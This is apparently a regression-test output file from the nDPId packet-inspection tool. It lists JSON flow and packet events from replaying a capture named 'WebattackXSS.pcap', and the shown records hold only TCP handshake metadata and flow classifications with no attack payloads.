-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2530,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":2,"flow_last_seen":1499347271163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347271163,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2HgbmHvT2w76ZKAScSAjFAAAAgQFtAQCCAoD4+HAAToQSgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":3,"flow_last_seen":1499347271163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347271163,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06ipAAD4G262sEAABwKgKMth4AFDbDvpkG5h71IAQAOXCGwAAAQEICgE6EEoD4+HA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347272469,"flow_last_seen":1499347272469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1499347272469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347272469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wnhAAD4GA1isEAABwKgKMtiGAFBxpNPoAAAAAKACchAt1gAAAgQFtAQCCAoBOhGQAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":2,"flow_last_seen":1499347272469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347272469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2IbhJKqDcaTT6aAScSC8IQAAAgQFtAQCCAoD4+MHAToRkAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":3,"flow_last_seen":1499347272470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347272470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wnlAAD4GA1+sEAABwKgKMtiGAFBxpNPp4SSqhIAQAOVbKAAAAQEICgE6EZED4+MH"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347146267,"flow_last_seen":1499347151654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54094,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347146267,"flow_last_seen":1499347151654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54094,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347147523,"flow_last_seen":1499347152654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54108,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347147523,"flow_last_seen":1499347152654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54108,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347150236,"flow_last_seen":1499347155656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54134,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347150236,"flow_last_seen":1499347155656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347151520,"flow_last_seen":1499347156656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347151520,"flow_last_seen":1499347156656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347152786,"flow_last_seen":1499347158656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54162,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347152786,"flow_last_seen":1499347158656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347273742,"flow_last_seen":1499347273742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347273742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1499347273742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347273742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8s+tAAD4GEeWsEAABwKgKMtiUAFBek6EkAAAAAKACchByXgAAAgQFtAQCCAoBOhLPAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":2,"flow_last_seen":1499347273742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347273742,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2JQ5PiSKXpOhJaAScSAtTAAAAgQFtAQCCAoD4+RFAToSzwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":3,"flow_last_seen":1499347273743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347273743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0s+xAAD4GEeysEAABwKgKMtiUAFBek6ElOT4ki4AQAOXMUwAAAQEICgE6Es8D4+RF"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347276278,"flow_last_seen":1499347276278,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347276278,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1499347276278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347276278,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8RHhAAD4GgVisEAABwKgKMtiuAFAiVFExAAAAAKACchD7\/AAAAgQFtAQCCAoBOhVJAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":2,"flow_last_seen":1499347276278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347276278,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2K6190rBIlRRMqAScSARgAAAAgQFtAQCCAoD4+a\/AToVSQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2573,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":3,"flow_last_seen":1499347276279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347276279,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0RHlAAD4GgV+sEAABwKgKMtiuAFAiVFEytfdKwoAQAOWwhwAAAQEICgE6FUkD4+a\/"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347277521,"flow_last_seen":1499347277521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347277521,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1499347277521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347277521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EvlAAD4GstesEAABwKgKMti8AFAjjgSGAAAAAKACchBGKgAAAgQFtAQCCAoBOhZ\/AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":2,"flow_last_seen":1499347277521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347277521,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2LxShGbpI44Eh6AScSChwgAAAgQFtAQCCAoD4+f1AToWfwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2585,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":3,"flow_last_seen":1499347277521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347277521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EvpAAD4Gst6sEAABwKgKMti8AFAjjgSHUoRm6oAQAOVAygAAAQEICgE6Fn8D4+f1"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347280049,"flow_last_seen":1499347280049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347280049,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1499347280049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347280049,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qXBAAD4GHGCsEAABwKgKMtjWAFBVFLGHAAAAAKACchBlEAAAAgQFtAQCCAoBOhj3AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2605,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":2,"flow_last_seen":1499347280049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347280049,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2NbA11G6VRSxiKAScSBlDAAAAgQFtAQCCAoD4+ptAToY9wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2606,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":3,"flow_last_seen":1499347280050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347280050,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qXFAAD4GHGesEAABwKgKMtjWAFBVFLGIwNdRu4AQAOUEEwAAAQEICgE6GPgD4+pt"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347281325,"flow_last_seen":1499347281325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347281325,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1499347281325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347281325,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8klhAAD4GM3isEAABwKgKMtjkAFB+h4huAAAAAKACchBjaQAAAgQFtAQCCAoBOho2AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2614,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":2,"flow_last_seen":1499347281325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347281325,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ORl6oVWfoeIb6AScSCJdwAAAgQFtAQCCAoD4+usAToaNgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2615,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":3,"flow_last_seen":1499347281326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347281326,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kllAAD4GM3+sEAABwKgKMtjkAFB+h4hvZeqFV4AQAOUofwAAAQEICgE6GjYD4+us"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2625,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347282573,"flow_last_seen":1499347282573,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282573,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2625,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1499347282573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347282573,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mj1AAD4GK5OsEAABwKgKMtjyAFDR4YFTAAAAAKACchAV5AAAAgQFtAQCCAoBOhtuAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1499347282574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347282574,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2PL\/kZOB0eGBVKAScSCS5gAAAgQFtAQCCAoD4+zlATobbgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":1499347282574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347282574,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mj5AAD4GK5qsEAABwKgKMtjyAFDR4YFU\/5GTgoAQAOUx7QAAAQEICgE6G28D4+zl"} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347097460,"flow_last_seen":1499347166757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347155346,"flow_last_seen":1499347160658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54188,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347155346,"flow_last_seen":1499347160658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54188,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347156630,"flow_last_seen":1499347161658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347156630,"flow_last_seen":1499347161658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347159323,"flow_last_seen":1499347164659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 